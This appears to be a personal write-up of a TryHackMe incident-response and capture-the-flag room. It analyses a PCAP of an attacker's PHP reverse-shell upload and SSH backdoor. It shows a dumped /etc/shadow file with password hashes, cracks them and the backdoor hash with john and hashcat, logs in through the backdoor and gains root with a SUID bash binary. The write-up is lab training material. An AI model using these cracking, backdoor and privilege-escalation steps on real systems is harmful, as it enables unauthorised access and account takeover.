This challange is from TryHackMe

Writeup

That’s not really typical, instead of just hacking we have reaction to incident

P.S These are my favourite type of CTF’s, let’s go

1. PCAP analysis

Open PCAP file in wireshark and follow TCP stream

There, in the first package we see HTTP headers

GET [Directory] HTTP/1.1
Host: 192.168.170.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

GET request sent to some directory - so I guess this is a URL for reverse shell

Let’s check next stream (nr. 1), so next part - payload

POST /development/upload.php HTTP/1.1
Host: 192.168.170.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

[...]
Content-Disposition: form-data; name="fileToUpload"; filename="payload.php"
Content-Type: application/x-php

[Payload]

-----------------------------1809049028579987031515260006
Content-Disposition: form-data; name="submit"
[..]

We have part of php code - it looks like a reverse shell - this is it:

We also have attacker’s IP address - I don’t know if it’s useful but still let’s note it

Next stream (nr. 2) - There is nothing interesting in it

But stream nr. 3 looks like actual reverse shell

There is also su command runned

www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: [Password]

That’s it, attacker switched user to james, his password is answer for another task

Let’s continue analyzing this stream - we need to find how did attacker established persistence

I guess it is connected to backdoor, answer looks like some link so let’s find some link I see some cloning - to be more specific ssh-backdoor repo - so we have it

Attacker left backdoor in our machine - so he/she can go back there any time he/she wants This is our flag for next task

Now we have to go back to our machine - attacker wanted to find users and their passwords, let’s check how many of them we can crack with john Let’s copy /etc/shadow file content into shadow file on our machine.

$ touch shadow # put /etc/shadow content from pcap package into it
$ cat shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::

Now, we have to crack it. It’s said to use fasttrack wordlist (not rockyou like often), so let’s use it

$ john --wordlist=/usr/share/wordlists/fasttrack.txt shadow
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
[Password1]      (paradox)     
[Password2]        (bee)     
[Password3]         (szymex)     
[Password4]         (muirland)     
4g 0:00:00:01 DONE (2023-05-12 20:47) 2.185g/s 121.3p/s 555.1c/s 555.1C/s admin..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We have passwords cracked - for accounts:

  • paradox
  • bee
  • szymex
  • muirland That’s flag for last task of this part

Now, hop to analysis

2. Backdoor analysis

We have open-source backdoor used here Let’s check it - head to github and analyze its code

I think that staring with main.go file will be the best In it, we have some variable right at the beginning

var hash string = [Hash]

I don’t know Golang but this is string variable with hash, it’s deafult one, so that’s our first flag for this task

Now we need to find deafult salt, we have it in passwordHandler() function

func passwordHandler(_ ssh.Context, password string) bool {
	return verifyPass(hash, [salt], password)
}

As we have read from verifyPass() function, second parameter is named salt and it’s not random - so that’s second flag of this part

But our attacker used some other hash, let’s go back to pcap file and find out what hash

From code analysis we know that -a option is for setting specific hash for backdoor

This command was used for running it

$ ./backdoor -a [Hashed used by attacker]

So it looks like hash we are looking for From further code analysis, this is salted SHA-512 hash - Really useful information

Now let’s put it into password.txt with salt, that we have found before and give it to hashcat to crack it for us (We have to use rockyou wordlist here)

$  hashcat -m 1710 -a 0 password.txt /usr/share/wordlists/rockyou.txt
[...]
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
:[password]
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1710 (sha512($pass.$salt))
[...]

And we have it, we cracked that password That’s our last flag for this part

Now - attack the server

3. Attack

First we need to find heading - let’s check the website

We have it right up on a website - Heading is our first flag

Now let’s perform Nmap scan

$ nmap -sC -sV $IP
[...]
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e43abeedffa702d26ad6d0bb7f385ecb (RSA)
|   256 fc6f22c2134f9c624f90c93a7e77d6d4 (ECDSA)
|_  256 15fd400a6559a9b50e571b230a966305 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: LOL Hacked
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2a6d21879e3b020a24faab6ac2e6bf2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have 2 SSH (port 22 and 2222) and Apache server We can’t log into any of the accounts with cracked passwords on port 22,

but we can log in for backdoor on port 2222

$ ssh -v -oHostKeyAlgorithms=+ssh-rsa -p 2222 james@10.10.99.160
[...]
james@10.10.99.160's password: 
[...]

james@overpass-production:/home/james/ssh-backdoor$ 

I had too use -oHostKeyAlgorithms=+ssh-rsa to set a proper host key type

Let’s get the user flag

$ cd ~
$ cat user.txt
[Flag]

Now the last part - Privilege Escalation

List the directory

$ ls -la
total 1136
drwxr-xr-x 7 james james    4096 Jul 22  2020 .
drwxr-xr-x 7 root  root     4096 Jul 21  2020 ..
lrwxrwxrwx 1 james james       9 Jul 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21  2020 .cache
drwx------ 3 james james    4096 Jul 21  2020 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22  2020 .local
-rw------- 1 james james      51 Jul 21  2020 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21  2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22  2020 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22  2020 user.txt
drwxrwxr-x 7 james james    4096 Jul 21  2020 www

There is a suspicious binary .suid_bash - And we can run it

Let’s do it

$ ./.suid_bash -p
# cd /root
# cat root.txt
[Root flag]

And we have it - we acquired our last flag

Conclusion

I liked this room, as I said before I love PCAP analysing

This was interesting room and as far as I remember it took me like 2 hours heh